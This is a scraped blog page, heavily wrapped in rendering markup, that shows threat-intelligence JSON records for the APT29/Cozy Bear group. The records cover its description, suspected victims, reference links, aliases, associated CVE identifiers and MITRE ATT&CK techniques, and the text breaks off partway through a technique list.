These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss). '\",\n  \"meta\": {\n    \"attribution-confidence\": \"50\",\n    \"cfr-suspected-state-sponsor\": \"Russian Federation\",\n    \"cfr-suspected-victims\": [\n      \"United States\",\n      \"China\",\n      \"New Zealand\",\n      \"Ukraine\",\n      \"Romania\",\n      \"Georgia\",\n      \"Japan\",\n      \"South Korea\",\n      \"Belgium\",\n      \"Kazakhstan\",\n      \"Brazil\",\n      \"Mexico\",\n      \"Turkey\",\n      \"Portugal\",\n      \"India\"\n    ],\n    \"cfr-target-category\": [\n      \"Government\",\n      \"Private sector\"\n    ],\n    \"cfr-type-of-incident\": [\n      \"Espionage\"\n    ],\n    \"country\": \"RU\",\n    \"refs\": [\n      \"https:\u002F\u002Flabsblog.f-secure.com\u002F2015\u002F09\u002F17\u002Fthe-dukes-7-years-of-russian-cyber-espionage\u002F\",\n      \"https:\u002F\u002Fwww2.fireeye.com\u002Frs\u002F848-DID-242\u002Fimages\u002Frpt-apt29-hammertoss.pdf\",\n      \"https:\u002F\u002Fwww.us-cert.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002FAR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf\",\n      
\"https:\u002F\u002Fwww.fireeye.com\u002Fblog\u002Fthreat-research\u002F2017\u002F03\u002Fdissecting_one_ofap.html\",\n      \"https:\u002F\u002Fwww.cfr.org\u002Finteractive\u002Fcyber-operations\u002Fdukes\",\n      \"https:\u002F\u002Fpylos.co\u002F2018\u002F11\u002F18\u002Fcozybear-in-from-the-cold\u002F\",\n      \"https:\u002F\u002Fcloudblogs.microsoft.com\u002Fmicrosoftsecure\u002F2018\u002F12\u002F03\u002Fanalysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers\u002F\",\n      \"https:\u002F\u002Fwww.secureworks.com\u002Fresearch\u002Fthreat-profiles\u002Firon-hemlock\",\n      \"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002FG0016\",\n      \"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fatoms\u002Fcloaked-ursa\u002F\",\n      \"https:\u002F\u002Fgo.recordedfuture.com\u002Fhubfs\u002Freports\u002Fcta-2023-0127.pdf\"\n    ],\n    \"synonyms\": [\n      \"Group 100\",\n      \"COZY BEAR\",\n      \"The Dukes\",\n      \"Minidionis\",\n      \"SeaDuke\",\n      \"YTTRIUM\",\n      \"IRON HEMLOCK\",\n      \"Grizzly Steppe\",\n      \"G0016\",\n      \"ATK7\",\n      \"Cloaked Ursa\",\n      \"TA421\",\n      \"Blue Kitsune\",\n      \"ITG11\",\n      \"BlueBravo\"\n    
]\n",[886,79717,79718,79731,79751,79763,79782,79802,79815,79825,79835,79846,79856,79866,79877,79888,79899,79910,79921,79932,79943,79953,79964,79972,79976,79989,80000,80009,80013,80026,80035,80039,80058,80071,80082,80093,80104,80115,80126,80137,80148,80159,80170,80181,80190,80194,80207,80218,80229,80240,80251,80262,80273,80284,80295,80305,80316,80327,80338,80349,80360,80369],{"__ignoreMap":219},[1373,79719,79720,79722,79725,79727,79729],{"class":1375,"line":1376},[1373,79721,183],{"class":1387},[1373,79723,79724],{"class":1391},"misp_threat_actor",[1373,79726,183],{"class":1387},[1373,79728,20051],{"class":4640},[1373,79730,8904],{"class":1383},[1373,79732,79733,79735,79738,79740,79742,79744,79747,79749],{"class":1375,"line":220},[1373,79734,23732],{"class":9152},[1373,79736,79737],{"class":9155},"description",[1373,79739,183],{"class":9152},[1373,79741,4606],{"class":1383},[1373,79743,4883],{"class":9173},[1373,79745,79746],{"class":9176},"A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. 
The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss). 
'",[1373,79748,183],{"class":9173},[1373,79750,9062],{"class":1383},[1373,79752,79753,79755,79757,79759,79761],{"class":1375,"line":1266},[1373,79754,23732],{"class":9152},[1373,79756,48983],{"class":9155},[1373,79758,183],{"class":9152},[1373,79760,4606],{"class":1383},[1373,79762,4765],{"class":1383},[1373,79764,79765,79767,79770,79772,79774,79776,79778,79780],{"class":1375,"line":1852},[1373,79766,19050],{"class":9152},[1373,79768,79769],{"class":9165},"attribution-confidence",[1373,79771,183],{"class":9152},[1373,79773,4606],{"class":1383},[1373,79775,4883],{"class":9173},[1373,79777,48192],{"class":9176},[1373,79779,183],{"class":9173},[1373,79781,9062],{"class":1383},[1373,79783,79784,79786,79789,79791,79793,79795,79798,79800],{"class":1375,"line":4692},[1373,79785,19050],{"class":9152},[1373,79787,79788],{"class":9165},"cfr-suspected-state-sponsor",[1373,79790,183],{"class":9152},[1373,79792,4606],{"class":1383},[1373,79794,4883],{"class":9173},[1373,79796,79797],{"class":9176},"Russian Federation",[1373,79799,183],{"class":9173},[1373,79801,9062],{"class":1383},[1373,79803,79804,79806,79809,79811,79813],{"class":1375,"line":4724},[1373,79805,19050],{"class":9152},[1373,79807,79808],{"class":9165},"cfr-suspected-victims",[1373,79810,183],{"class":9152},[1373,79812,4606],{"class":1383},[1373,79814,26352],{"class":1383},[1373,79816,79817,79819,79821,79823],{"class":1375,"line":4756},[1373,79818,26357],{"class":9173},[1373,79820,1494],{"class":9176},[1373,79822,183],{"class":9173},[1373,79824,9062],{"class":1383},[1373,79826,79827,79829,79831,79833],{"class":1375,"line":4768},[1373,79828,26357],{"class":9173},[1373,79830,61571],{"class":9176},[1373,79832,183],{"class":9173},[1373,79834,9062],{"class":1383},[1373,79836,79837,79839,79842,79844],{"class":1375,"line":4792},[1373,79838,26357],{"class":9173},[1373,79840,79841],{"class":9176},"New 
Zealand",[1373,79843,183],{"class":9173},[1373,79845,9062],{"class":1383},[1373,79847,79848,79850,79852,79854],{"class":1375,"line":4798},[1373,79849,26357],{"class":9173},[1373,79851,916],{"class":9176},[1373,79853,183],{"class":9173},[1373,79855,9062],{"class":1383},[1373,79857,79858,79860,79862,79864],{"class":1375,"line":4806},[1373,79859,26357],{"class":9173},[1373,79861,65838],{"class":9176},[1373,79863,183],{"class":9173},[1373,79865,9062],{"class":1383},[1373,79867,79868,79870,79873,79875],{"class":1375,"line":4817},[1373,79869,26357],{"class":9173},[1373,79871,79872],{"class":9176},"Georgia",[1373,79874,183],{"class":9173},[1373,79876,9062],{"class":1383},[1373,79878,79879,79881,79884,79886],{"class":1375,"line":4825},[1373,79880,26357],{"class":9173},[1373,79882,79883],{"class":9176},"Japan",[1373,79885,183],{"class":9173},[1373,79887,9062],{"class":1383},[1373,79889,79890,79892,79895,79897],{"class":1375,"line":4835},[1373,79891,26357],{"class":9173},[1373,79893,79894],{"class":9176},"South 
Korea",[1373,79896,183],{"class":9173},[1373,79898,9062],{"class":1383},[1373,79900,79901,79903,79906,79908],{"class":1375,"line":4843},[1373,79902,26357],{"class":9173},[1373,79904,79905],{"class":9176},"Belgium",[1373,79907,183],{"class":9173},[1373,79909,9062],{"class":1383},[1373,79911,79912,79914,79917,79919],{"class":1375,"line":4849},[1373,79913,26357],{"class":9173},[1373,79915,79916],{"class":9176},"Kazakhstan",[1373,79918,183],{"class":9173},[1373,79920,9062],{"class":1383},[1373,79922,79923,79925,79928,79930],{"class":1375,"line":4877},[1373,79924,26357],{"class":9173},[1373,79926,79927],{"class":9176},"Brazil",[1373,79929,183],{"class":9173},[1373,79931,9062],{"class":1383},[1373,79933,79934,79936,79939,79941],{"class":1375,"line":4915},[1373,79935,26357],{"class":9173},[1373,79937,79938],{"class":9176},"Mexico",[1373,79940,183],{"class":9173},[1373,79942,9062],{"class":1383},[1373,79944,79945,79947,79949,79951],{"class":1375,"line":4931},[1373,79946,26357],{"class":9173},[1373,79948,61598],{"class":9176},[1373,79950,183],{"class":9173},[1373,79952,9062],{"class":1383},[1373,79954,79955,79957,79960,79962],{"class":1375,"line":4947},[1373,79956,26357],{"class":9173},[1373,79958,79959],{"class":9176},"Portugal",[1373,79961,183],{"class":9173},[1373,79963,9062],{"class":1383},[1373,79965,79966,79968,79970],{"class":1375,"line":4952},[1373,79967,26357],{"class":9173},[1373,79969,65892],{"class":9176},[1373,79971,19057],{"class":9173},[1373,79973,79974],{"class":1375,"line":6776},[1373,79975,26366],{"class":1383},[1373,79977,79978,79980,79983,79985,79987],{"class":1375,"line":6781},[1373,79979,19050],{"class":9152},[1373,79981,79982],{"class":9165},"cfr-target-category",[1373,79984,183],{"class":9152},[1373,79986,4606],{"class":1383},[1373,79988,26352],{"class":1383},[1373,79990,79991,79993,79996,79998],{"class":1375,"line":7524},[1373,79992,26357],{"class":9173},[1373,79994,79995],{"class":9176},"Government",[1373,79997,183],{"class":9173},[1373,79999,9062],
{"class":1383},[1373,80001,80002,80004,80007],{"class":1375,"line":7530},[1373,80003,26357],{"class":9173},[1373,80005,80006],{"class":9176},"Private sector",[1373,80008,19057],{"class":9173},[1373,80010,80011],{"class":1375,"line":7546},[1373,80012,26366],{"class":1383},[1373,80014,80015,80017,80020,80022,80024],{"class":1375,"line":7571},[1373,80016,19050],{"class":9152},[1373,80018,80019],{"class":9165},"cfr-type-of-incident",[1373,80021,183],{"class":9152},[1373,80023,4606],{"class":1383},[1373,80025,26352],{"class":1383},[1373,80027,80028,80030,80033],{"class":1375,"line":7598},[1373,80029,26357],{"class":9173},[1373,80031,80032],{"class":9176},"Espionage",[1373,80034,19057],{"class":9173},[1373,80036,80037],{"class":1375,"line":7615},[1373,80038,26366],{"class":1383},[1373,80040,80041,80043,80045,80047,80049,80051,80054,80056],{"class":1375,"line":7635},[1373,80042,19050],{"class":9152},[1373,80044,26274],{"class":9165},[1373,80046,183],{"class":9152},[1373,80048,4606],{"class":1383},[1373,80050,4883],{"class":9173},[1373,80052,80053],{"class":9176},"RU",[1373,80055,183],{"class":9173},[1373,80057,9062],{"class":1383},[1373,80059,80060,80062,80065,80067,80069],{"class":1375,"line":7640},[1373,80061,19050],{"class":9152},[1373,80063,80064],{"class":9165},"refs",[1373,80066,183],{"class":9152},[1373,80068,4606],{"class":1383},[1373,80070,26352],{"class":1383},[1373,80072,80073,80075,80078,80080],{"class":1375,"line":7648},[1373,80074,26357],{"class":9173},[1373,80076,80077],{"class":9176},"https:\u002F\u002Flabsblog.f-secure.com\u002F2015\u002F09\u002F17\u002Fthe-dukes-7-years-of-russian-cyber-espionage\u002F",[1373,80079,183],{"class":9173},[1373,80081,9062],{"class":1383},[1373,80083,80084,80086,80089,80091],{"class":1375,"line":7672},[1373,80085,26357],{"class":9173},[1373,80087,80088],{"class":9176},"https:\u002F\u002Fwww2.fireeye.com\u002Frs\u002F848-DID-242\u002Fimages\u002Frpt-apt29-hammertoss.pdf",[1373,80090,183],{"class":9173},[1373,80092,9062],{"class
":1383},[1373,80094,80095,80097,80100,80102],{"class":1375,"line":7688},[1373,80096,26357],{"class":9173},[1373,80098,80099],{"class":9176},"https:\u002F\u002Fwww.us-cert.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002FAR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf",[1373,80101,183],{"class":9173},[1373,80103,9062],{"class":1383},[1373,80105,80106,80108,80111,80113],{"class":1375,"line":7709},[1373,80107,26357],{"class":9173},[1373,80109,80110],{"class":9176},"https:\u002F\u002Fwww.fireeye.com\u002Fblog\u002Fthreat-research\u002F2017\u002F03\u002Fdissecting_one_ofap.html",[1373,80112,183],{"class":9173},[1373,80114,9062],{"class":1383},[1373,80116,80117,80119,80122,80124],{"class":1375,"line":7714},[1373,80118,26357],{"class":9173},[1373,80120,80121],{"class":9176},"https:\u002F\u002Fwww.cfr.org\u002Finteractive\u002Fcyber-operations\u002Fdukes",[1373,80123,183],{"class":9173},[1373,80125,9062],{"class":1383},[1373,80127,80128,80130,80133,80135],{"class":1375,"line":7722},[1373,80129,26357],{"class":9173},[1373,80131,80132],{"class":9176},"https:\u002F\u002Fpylos.co\u002F2018\u002F11\u002F18\u002Fcozybear-in-from-the-cold\u002F",[1373,80134,183],{"class":9173},[1373,80136,9062],{"class":1383},[1373,80138,80139,80141,80144,80146],{"class":1375,"line":9903},[1373,80140,26357],{"class":9173},[1373,80142,80143],{"class":9176},"https:\u002F\u002Fcloudblogs.microsoft.com\u002Fmicrosoftsecure\u002F2018\u002F12\u002F03\u002Fanalysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers\u002F",[1373,80145,183],{"class":9173},[1373,80147,9062],{"class":1383},[1373,80149,80150,80152,80155,80157],{"class":1375,"line":9908},[1373,80151,26357],{"class":9173},[1373,80153,80154],{"class":9176},"https:\u002F\u002Fwww.secureworks.com\u002Fresearch\u002Fthreat-profiles\u002Firon-hemlock",[1373,80156,183],{"class":9173},[1373,80158,9062],{"class":1383},[1373,80160,80161,80163,80166,80168],{"class":1375,"line":9913},[1373,80162
,26357],{"class":9173},[1373,80164,80165],{"class":9176},"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002FG0016",[1373,80167,183],{"class":9173},[1373,80169,9062],{"class":1383},[1373,80171,80172,80174,80177,80179],{"class":1375,"line":9932},[1373,80173,26357],{"class":9173},[1373,80175,80176],{"class":9176},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fatoms\u002Fcloaked-ursa\u002F",[1373,80178,183],{"class":9173},[1373,80180,9062],{"class":1383},[1373,80182,80183,80185,80188],{"class":1375,"line":9937},[1373,80184,26357],{"class":9173},[1373,80186,80187],{"class":9176},"https:\u002F\u002Fgo.recordedfuture.com\u002Fhubfs\u002Freports\u002Fcta-2023-0127.pdf",[1373,80189,19057],{"class":9173},[1373,80191,80192],{"class":1375,"line":9957},[1373,80193,26366],{"class":1383},[1373,80195,80196,80198,80201,80203,80205],{"class":1375,"line":9962},[1373,80197,19050],{"class":9152},[1373,80199,80200],{"class":9165},"synonyms",[1373,80202,183],{"class":9152},[1373,80204,4606],{"class":1383},[1373,80206,26352],{"class":1383},[1373,80208,80209,80211,80214,80216],{"class":1375,"line":15955},[1373,80210,26357],{"class":9173},[1373,80212,80213],{"class":9176},"Group 100",[1373,80215,183],{"class":9173},[1373,80217,9062],{"class":1383},[1373,80219,80220,80222,80225,80227],{"class":1375,"line":16030},[1373,80221,26357],{"class":9173},[1373,80223,80224],{"class":9176},"COZY BEAR",[1373,80226,183],{"class":9173},[1373,80228,9062],{"class":1383},[1373,80230,80231,80233,80236,80238],{"class":1375,"line":16035},[1373,80232,26357],{"class":9173},[1373,80234,80235],{"class":9176},"The 
Dukes",[1373,80237,183],{"class":9173},[1373,80239,9062],{"class":1383},[1373,80241,80242,80244,80247,80249],{"class":1375,"line":16083},[1373,80243,26357],{"class":9173},[1373,80245,80246],{"class":9176},"Minidionis",[1373,80248,183],{"class":9173},[1373,80250,9062],{"class":1383},[1373,80252,80253,80255,80258,80260],{"class":1375,"line":16098},[1373,80254,26357],{"class":9173},[1373,80256,80257],{"class":9176},"SeaDuke",[1373,80259,183],{"class":9173},[1373,80261,9062],{"class":1383},[1373,80263,80264,80266,80269,80271],{"class":1375,"line":16103},[1373,80265,26357],{"class":9173},[1373,80267,80268],{"class":9176},"YTTRIUM",[1373,80270,183],{"class":9173},[1373,80272,9062],{"class":1383},[1373,80274,80275,80277,80280,80282],{"class":1375,"line":16147},[1373,80276,26357],{"class":9173},[1373,80278,80279],{"class":9176},"IRON HEMLOCK",[1373,80281,183],{"class":9173},[1373,80283,9062],{"class":1383},[1373,80285,80286,80288,80291,80293],{"class":1375,"line":16153},[1373,80287,26357],{"class":9173},[1373,80289,80290],{"class":9176},"Grizzly Steppe",[1373,80292,183],{"class":9173},[1373,80294,9062],{"class":1383},[1373,80296,80297,80299,80301,80303],{"class":1375,"line":16164},[1373,80298,26357],{"class":9173},[1373,80300,79533],{"class":9176},[1373,80302,183],{"class":9173},[1373,80304,9062],{"class":1383},[1373,80306,80307,80309,80312,80314],{"class":1375,"line":16170},[1373,80308,26357],{"class":9173},[1373,80310,80311],{"class":9176},"ATK7",[1373,80313,183],{"class":9173},[1373,80315,9062],{"class":1383},[1373,80317,80318,80320,80323,80325],{"class":1375,"line":16187},[1373,80319,26357],{"class":9173},[1373,80321,80322],{"class":9176},"Cloaked 
Ursa",[1373,80324,183],{"class":9173},[1373,80326,9062],{"class":1383},[1373,80328,80329,80331,80334,80336],{"class":1375,"line":16198},[1373,80330,26357],{"class":9173},[1373,80332,80333],{"class":9176},"TA421",[1373,80335,183],{"class":9173},[1373,80337,9062],{"class":1383},[1373,80339,80340,80342,80345,80347],{"class":1375,"line":16204},[1373,80341,26357],{"class":9173},[1373,80343,80344],{"class":9176},"Blue Kitsune",[1373,80346,183],{"class":9173},[1373,80348,9062],{"class":1383},[1373,80350,80351,80353,80356,80358],{"class":1375,"line":16210},[1373,80352,26357],{"class":9173},[1373,80354,80355],{"class":9176},"ITG11",[1373,80357,183],{"class":9173},[1373,80359,9062],{"class":1383},[1373,80361,80362,80364,80367],{"class":1375,"line":16254},[1373,80363,26357],{"class":9173},[1373,80365,80366],{"class":9176},"BlueBravo",[1373,80368,19057],{"class":9173},[1373,80370,80371],{"class":1375,"line":18499},[1373,80372,80373],{"class":1383},"    ]\n",[61,80375,80377],{"id":80376},"cves-associated-with-threat-actor-evidence-backed","CVEs Associated with Threat Actor (Evidence Backed)",[18,80379,80380],{},"We can expand our research to explore CVEs tied to the threat actor which is evidence backed by reputable sources. 
This should send some joy down the spine of any vulnerability management team as they verify any of these CVEs exist in their most recent scan data.",[18,80382,80383],{},[68,80384],{":width":10862,"alt":80385,"src":80386},"Threat-Actors-Cozy-Bear-CVE","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-CVE.png",[18,80388,80389],{},"Example JSON CVE References:",[1354,80391,80393],{"className":22307,"code":80392,"language":22309,"meta":219,"style":219},"\"cve_references\": [\n  {\n    \"url\": \"https:\u002F\u002Fwww.recordedfuture.com\u002Frussian-apt-toolkits\",\n    \"date_added\": \"2016-08-04\",\n    \"cve\": [\n      \"cve-2010-0232\",\n      \"cve-2010-4398\",\n      \"cve-2013-0640\",\n      \"cve-2013-0641\"\n    ]\n  },\n  {\n    \"url\": \"https:\u002F\u002Fmedia.defense.gov\u002F2020\u002Fjul\u002F16\u002F2002457639\u002F-1\u002F-1\u002F0\u002Fncsc_apt29_advisory-quad-official-20200709-1810.pdf\",\n    \"date_added\": \"2020-07-16\",\n    \"cve\": [\n      \"cve-2018-13379\",\n      \"cve-2019-9670\",\n      \"cve-2019-11510\",\n      \"cve-2019-19781\"\n    
]\n",[886,80394,80395,80408,80412,80431,80449,80461,80472,80483,80494,80503,80507,80511,80515,80534,80553,80565,80576,80587,80598,80607],{"__ignoreMap":219},[1373,80396,80397,80399,80402,80404,80406],{"class":1375,"line":1376},[1373,80398,183],{"class":1387},[1373,80400,80401],{"class":1391},"cve_references",[1373,80403,183],{"class":1387},[1373,80405,20051],{"class":4640},[1373,80407,9050],{"class":1383},[1373,80409,80410],{"class":1375,"line":220},[1373,80411,26177],{"class":1383},[1373,80413,80414,80416,80418,80420,80422,80424,80427,80429],{"class":1375,"line":1266},[1373,80415,19050],{"class":9152},[1373,80417,7585],{"class":9155},[1373,80419,183],{"class":9152},[1373,80421,4606],{"class":1383},[1373,80423,4883],{"class":9173},[1373,80425,80426],{"class":9176},"https:\u002F\u002Fwww.recordedfuture.com\u002Frussian-apt-toolkits",[1373,80428,183],{"class":9173},[1373,80430,9062],{"class":1383},[1373,80432,80433,80435,80437,80439,80441,80443,80445,80447],{"class":1375,"line":1852},[1373,80434,19050],{"class":9152},[1373,80436,12998],{"class":9155},[1373,80438,183],{"class":9152},[1373,80440,4606],{"class":1383},[1373,80442,4883],{"class":9173},[1373,80444,79513],{"class":9176},[1373,80446,183],{"class":9173},[1373,80448,9062],{"class":1383},[1373,80450,80451,80453,80455,80457,80459],{"class":1375,"line":4692},[1373,80452,19050],{"class":9152},[1373,80454,242],{"class":9155},[1373,80456,183],{"class":9152},[1373,80458,4606],{"class":1383},[1373,80460,26352],{"class":1383},[1373,80462,80463,80465,80468,80470],{"class":1375,"line":4724},[1373,80464,26357],{"class":9173},[1373,80466,80467],{"class":9176},"cve-2010-0232",[1373,80469,183],{"class":9173},[1373,80471,9062],{"class":1383},[1373,80473,80474,80476,80479,80481],{"class":1375,"line":4756},[1373,80475,26357],{"class":9173},[1373,80477,80478],{"class":9176},"cve-2010-4398",[1373,80480,183],{"class":9173},[1373,80482,9062],{"class":1383},[1373,80484,80485,80487,80490,80492],{"class":1375,"line":4768},[1373,80486,2
6357],{"class":9173},[1373,80488,80489],{"class":9176},"cve-2013-0640",[1373,80491,183],{"class":9173},[1373,80493,9062],{"class":1383},[1373,80495,80496,80498,80501],{"class":1375,"line":4792},[1373,80497,26357],{"class":9173},[1373,80499,80500],{"class":9176},"cve-2013-0641",[1373,80502,19057],{"class":9173},[1373,80504,80505],{"class":1375,"line":4798},[1373,80506,80373],{"class":1383},[1373,80508,80509],{"class":1375,"line":4806},[1373,80510,23985],{"class":1383},[1373,80512,80513],{"class":1375,"line":4817},[1373,80514,26177],{"class":1383},[1373,80516,80517,80519,80521,80523,80525,80527,80530,80532],{"class":1375,"line":4825},[1373,80518,19050],{"class":9152},[1373,80520,7585],{"class":9155},[1373,80522,183],{"class":9152},[1373,80524,4606],{"class":1383},[1373,80526,4883],{"class":9173},[1373,80528,80529],{"class":9176},"https:\u002F\u002Fmedia.defense.gov\u002F2020\u002Fjul\u002F16\u002F2002457639\u002F-1\u002F-1\u002F0\u002Fncsc_apt29_advisory-quad-official-20200709-1810.pdf",[1373,80531,183],{"class":9173},[1373,80533,9062],{"class":1383},[1373,80535,80536,80538,80540,80542,80544,80546,80549,80551],{"class":1375,"line":4835},[1373,80537,19050],{"class":9152},[1373,80539,12998],{"class":9155},[1373,80541,183],{"class":9152},[1373,80543,4606],{"class":1383},[1373,80545,4883],{"class":9173},[1373,80547,80548],{"class":9176},"2020-07-16",[1373,80550,183],{"class":9173},[1373,80552,9062],{"class":1383},[1373,80554,80555,80557,80559,80561,80563],{"class":1375,"line":4843},[1373,80556,19050],{"class":9152},[1373,80558,242],{"class":9155},[1373,80560,183],{"class":9152},[1373,80562,4606],{"class":1383},[1373,80564,26352],{"class":1383},[1373,80566,80567,80569,80572,80574],{"class":1375,"line":4849},[1373,80568,26357],{"class":9173},[1373,80570,80571],{"class":9176},"cve-2018-13379",[1373,80573,183],{"class":9173},[1373,80575,9062],{"class":1383},[1373,80577,80578,80580,80583,80585],{"class":1375,"line":4877},[1373,80579,26357],{"class":9173},[1373,80581,80582],{"c
lass":9176},"cve-2019-9670",[1373,80584,183],{"class":9173},[1373,80586,9062],{"class":1383},[1373,80588,80589,80591,80594,80596],{"class":1375,"line":4915},[1373,80590,26357],{"class":9173},[1373,80592,80593],{"class":9176},"cve-2019-11510",[1373,80595,183],{"class":9173},[1373,80597,9062],{"class":1383},[1373,80599,80600,80602,80605],{"class":1375,"line":4931},[1373,80601,26357],{"class":9173},[1373,80603,80604],{"class":9176},"cve-2019-19781",[1373,80606,19057],{"class":9173},[1373,80608,80609],{"class":1375,"line":4947},[1373,80610,80373],{"class":1383},[61,80612,80614],{"id":80613},"mitre-attack-techniques-aliases","MITRE Attack Techniques \u002F Aliases",[18,80616,80617],{},"Now we can really spice things up for the SOC analyst team with the addition of MITRE Att&ck references used by the threat actor.",[18,80619,80620],{},[68,80621],{":width":10862,"alt":80622,"src":80623},"Threat-Actors-Cozy-Bear-Mitre","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Mitre.png",[18,80625,80626],{},"Example JSON Mitre Att&ck:",[1354,80628,80630],{"className":22307,"code":80629,"language":22309,"meta":219,"style":219},"  \"mitre_attack_group\": {\n    \"name\": \"APT29\",\n    \"aliases\": [\n      \"APT29\",\n      \"YTTRIUM\",\n      \"The Dukes\",\n      \"Cozy Bear\",\n      \"CozyDuke\"\n    ],\n    \"description\": \"APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008.   This group reportedly compromised the Democratic National Committee starting in the summer of 2015. 
\",\n    \"techniques\": [\n      {\n        \"technique_id\": \"T1001\",\n        \"technique_name\": \"Data Obfuscation\",\n        \"sub_technique\": \"002\",\n        \"sub_technique_name\": \"Steganography\",\n        \"tactic\": [\n          \"command-and-control\"\n        ]\n      },\n      {\n        \"technique_id\": \"T1027\",\n        \"technique_name\": \"Obfuscated Files or Information\",\n        \"tactic\": [\n          \"defense-evasion\"\n        ]\n      },\n      {\n        \"technique_id\": \"T1027\",\n        \"technique_name\": \"Obfuscated Files or Information\",\n        \"sub_technique\": \"002\",\n        \"sub_technique_name\": \"Software Packing\",\n        \"tactic\": [\n          \"defense-evasion\"\n        ]\n",[886,80631,80632,80645,80664,80676,80686,80696,80706,80716,80725,80729,80748,80761,80766,80786,80806,80826,80846,80859,80868,80873,80877,80881,80900,80919,80931,80940,80944,80948,80952,80970,80988,81006,81025,81037,81045],{"__ignoreMap":219},[1373,80633,80634,80636,80639,80641,80643],{"class":1375,"line":1376},[1373,80635,23732],{"class":1387},[1373,80637,80638],{"class":1391},"mitre_attack_group",[1373,80640,183],{"class":1387},[1373,80642,20051],{"class":4640},[1373,80644,8904],{"class":1383},[1373,80646,80647,80649,80651,80653,80655,80657,80660,80662],{"class":1375,"line":220},[1373,80648,19050],{"class":9152},[1373,80650,30774],{"class":9155},[1373,80652,183],{"class":9152},[1373,80654,4606],{"class":1383},[1373,80656,4883],{"class":9173},[1373,80658,80659],{"class":9176},"APT29",[1373,80661,183],{"class":9173},[1373,80663,9062],{"class":1383},[1373,80665,80666,80668,80670,80672,80674],{"class":1375,"line":1266},[1373,80667,19050],{"class":9152},[1373,80669,43489],{"class":9155},[1373,80671,183],{"class":9152},[1373,80673,4606],{"class":1383},[1373,80675,26352],{"class":1383},[1373,80677,80678,80680,80682,80684],{"class":1375,"line":1852},[1373,80679,26357],{"class":9173},[1373,80681,80659],{"class":9176},[1373,80683,183],
{"class":9173},[1373,80685,9062],{"class":1383},[1373,80687,80688,80690,80692,80694],{"class":1375,"line":4692},[1373,80689,26357],{"class":9173},[1373,80691,80268],{"class":9176},[1373,80693,183],{"class":9173},[1373,80695,9062],{"class":1383},[1373,80697,80698,80700,80702,80704],{"class":1375,"line":4724},[1373,80699,26357],{"class":9173},[1373,80701,80235],{"class":9176},[1373,80703,183],{"class":9173},[1373,80705,9062],{"class":1383},[1373,80707,80708,80710,80712,80714],{"class":1375,"line":4756},[1373,80709,26357],{"class":9173},[1373,80711,79494],{"class":9176},[1373,80713,183],{"class":9173},[1373,80715,9062],{"class":1383},[1373,80717,80718,80720,80723],{"class":1375,"line":4768},[1373,80719,26357],{"class":9173},[1373,80721,80722],{"class":9176},"CozyDuke",[1373,80724,19057],{"class":9173},[1373,80726,80727],{"class":1375,"line":4792},[1373,80728,26366],{"class":1383},[1373,80730,80731,80733,80735,80737,80739,80741,80744,80746],{"class":1375,"line":4798},[1373,80732,19050],{"class":9152},[1373,80734,79737],{"class":9155},[1373,80736,183],{"class":9152},[1373,80738,4606],{"class":1383},[1373,80740,4883],{"class":9173},[1373,80742,80743],{"class":9176},"APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008.   This group reportedly compromised the Democratic National Committee starting in the summer of 2015. 
